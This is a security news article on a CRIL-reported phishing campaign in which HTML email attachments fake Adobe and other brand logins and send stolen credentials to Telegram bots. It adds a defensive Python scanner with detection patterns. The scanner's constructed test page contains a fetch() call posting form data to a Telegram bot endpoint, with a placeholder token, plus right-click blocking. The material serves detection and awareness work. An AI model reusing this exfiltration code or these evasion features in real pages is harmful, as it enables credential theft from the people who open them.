Researchers from Cyble Research and Intelligence Labs (CRIL) have uncovered a massive, multi-brand phishing campaign that uses HTML email attachments to steal credentials — bypassing traditional URL and domain-based detection systems. The stolen data is exfiltrated directly to attacker-controlled Telegram bots, enabling near-instant credential harvesting without relying on conventional command-and-control servers.
“Attackers distribute HTML attachments through email, successfully bypassing conventional security checks by not using suspicious URLs or hosting on external servers,” CRIL explained. “The embedded HTML files run JavaScript that steals user credentials and sends them directly to attacker-controlled Telegram bots.”
The phishing messages mimic business correspondence such as Request for Quotation (RFQ) or invoice confirmations, enticing recipients to open what appears to be a document attachment. The attached file, however, is a self-contained HTML page designed to resemble a legitimate Adobe login prompt.
When opened, the HTML page loads a blurred invoice background and a fake Adobe sign-in form centered on the screen. Victims are prompted to enter their email address and password — data that is immediately sent to Telegram’s Bot API.
“The page executes JavaScript that reads the field values and constructs a message payload… performing an HTTP POST to https://api.telegram.org/bot<BotToken>/sendMessage with chat_id and text fields containing the harvested credentials,” the researchers explained.
After submission, the page displays an “invalid login” message to avoid suspicion and prevent users from realizing they’ve been compromised.
CRIL analyzed multiple HTML samples from the campaign and identified progressive improvements in obfuscation, encryption, and evasion. One sample implemented AES encryption via the CryptoJS library using hard-coded keys, while another employed a dual-password capture mechanism, asking users to re-enter credentials under the pretense of an incorrect password.
“The sample harvests Email Address and Password, captures IP Address and user-agent, followed by exfiltration to Telegram,” the report stated. “It uses jQuery and external IP services such as api.ipify.org and ip-api.com to capture the IP address of the victims.”
A second, more advanced version used the native Fetch API and added anti-forensics defenses designed to keep both victims and analysts from viewing the underlying code.
“The implementation blocks F12, Ctrl+U/S/C/A/X, Ctrl+Shift+I, right-click context menu, text selection, and drag events,” CRIL detailed. “This leads to the prevention of victims and analysts from inspecting code, viewing source, copying content, or extracting assets.”
This obfuscation ensures that even seasoned analysts cannot easily extract bot tokens or decipher the JavaScript, making the campaign harder to detect or disrupt.
The Telegram Bot API serves as the central exfiltration mechanism, replacing traditional web-based control servers. Each malicious HTML sample includes hard-coded bot tokens and chat IDs, transmitting credentials in real time to the attacker’s Telegram account.
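The report's description of the exfiltration path (a POST to `api.telegram.org/bot<token>/sendMessage` with `chat_id` and `text`), the CryptoJS payload encryption, the public IP-lookup calls, and the DevTools/right-click blocking together give a defender a compact set of static indicators for triaging HTML attachments. The scanner below is an added example, not code from CRIL or from the campaign: it searches an HTML file for those indicators, extracts any embedded bot token so reused infrastructure can be clustered across samples (as the report notes identical tokens appearing in different brand templates), and returns a verdict. The two HTML inputs are constructed for the demonstration; the bot token is an obviously fake placeholder, and the indicator names and scoring thresholds are this example's own assumptions.

```python
import re
from typing import Dict, List

# Indicator patterns derived from the behaviours described in the CRIL report.
INDICATORS: Dict[str, re.Pattern] = {
    # Telegram Bot API endpoint with an embedded bot token (digits:secret)
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot\d{6,12}:[A-Za-z0-9_-]{30,}", re.I),
    "telegram_send_message": re.compile(r"\bsendMessage\b"),
    "telegram_chat_id": re.compile(r"\bchat_id\b"),
    # Client-side AES of the payload via CryptoJS with hard-coded keys
    "cryptojs": re.compile(r"crypto-js|\bCryptoJS\b", re.I),
    # Victim IP collection through public lookup services
    "ip_lookup_service": re.compile(r"api\.ipify\.org|ip-api\.com", re.I),
    # Anti-forensics: context-menu, F12 (keyCode 123), selection and drag blocking
    "anti_forensics": re.compile(
        r"contextmenu|keyCode\s*===?\s*123|['\"]F12['\"]|selectstart|dragstart", re.I),
    # A password field inside a stand-alone HTML attachment
    "credential_form": re.compile(r"type\s*=\s*['\"]password['\"]", re.I),
}

# Captures the token portion so identical tokens can be matched across samples.
TOKEN_RE = re.compile(r"api\.telegram\.org/bot(\d{6,12}:[A-Za-z0-9_-]{30,})", re.I)


def scan_html_attachment(html: str) -> dict:
    """Return {'verdict', 'indicators', 'bot_tokens'} for one HTML attachment."""
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(html)]
    tokens = sorted(set(TOKEN_RE.findall(html)))
    # A Telegram bot endpoint inside an email attachment is a strong signal on
    # its own; otherwise require several weaker indicators to co-occur, so a
    # normal login page with one password field is not flagged (assumed policy).
    if "telegram_bot_api" in hits:
        verdict = "malicious"
    elif len(hits) >= 3:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits, "bot_tokens": tokens}


# --- constructed inputs for the demonstration (not real samples) ---------
FAKE_TOKEN = "0000000000:" + "A" * 35  # placeholder, not a real bot token

SAMPLE_PHISHING_HTML = """<html><body>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
<form><input type="email"><input type="password"></form>
<script>
document.addEventListener('contextmenu', function (e) { e.preventDefault(); });
fetch("https://api.ipify.org?format=json");
fetch("https://api.telegram.org/bot{TOKEN}/sendMessage",
      { method: "POST", body: JSON.stringify({ chat_id: "0", text: "..." }) });
</script></body></html>""".replace("{TOKEN}", FAKE_TOKEN)

# An ordinary login page: one password field and an Enter-key handler only.
SAMPLE_BENIGN_HTML = """<html><body>
<form action="/login" method="post"><input type="password" name="pw"></form>
<script>
document.addEventListener('keydown', function (e) { if (e.key === 'Enter') { submit(); } });
</script></body></html>"""


if __name__ == "__main__":
    for label, doc in (("phishing", SAMPLE_PHISHING_HTML), ("benign", SAMPLE_BENIGN_HTML)):
        print(label, scan_html_attachment(doc))
```

Running the block prints the two verdicts. In a mail gateway the same function can be applied to every `text/html` or `.html`/`.htm` attachment before delivery, and the extracted token list is what you would pivot on when checking whether a new sample shares infrastructure with earlier FedEx-, Adobe- or WeTransfer-themed ones.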
CRIL’s analysis uncovered a decentralized network of active bots operated by multiple threat actors, each managing its own set of phishing campaigns.
The researchers also noted evidence of infrastructure reuse across multiple campaigns, with identical bot tokens appearing in different brand-themed phishing templates — for example, one token linked to FedEx-themed samples, and another reused in Adobe and WeTransfer variants.
To maximize legitimacy and regional penetration, the attackers impersonated a wide range of global technology, logistics, and telecommunications brands.
Among the most frequently abused were:
- Adobe, Microsoft, WeTransfer, and DocuSign — to mimic document-sharing workflows.
- FedEx and DHL — for logistics-themed campaigns.
- Telekom Deutschland / T-Mobile and Roundcube — for region-specific phishing lures targeting European users.
In Central Europe — including the Czech Republic, Slovakia, Hungary, and Germany — the phishing emails often mimic legitimate B2B procurement requests, using native-language terminology and authentic formatting.
CRIL’s telemetry suggests that dozens of unique HTML samples are in circulation, pointing to an automated phishing toolkit that allows attackers to generate new variants quickly.
CRIL confirmed that the operation primarily targets organizations in Central and Eastern Europe, reaching across the energy, manufacturing, telecommunications, and government sectors.
“A sophisticated credential-harvesting attack that is also scalable poses a potent threat,” CRIL warned. “Impersonating trusted brands, targeting specific audiences, and using Telegram for data exfiltration pose a low-cost yet high-impact threat to organizations worldwide.”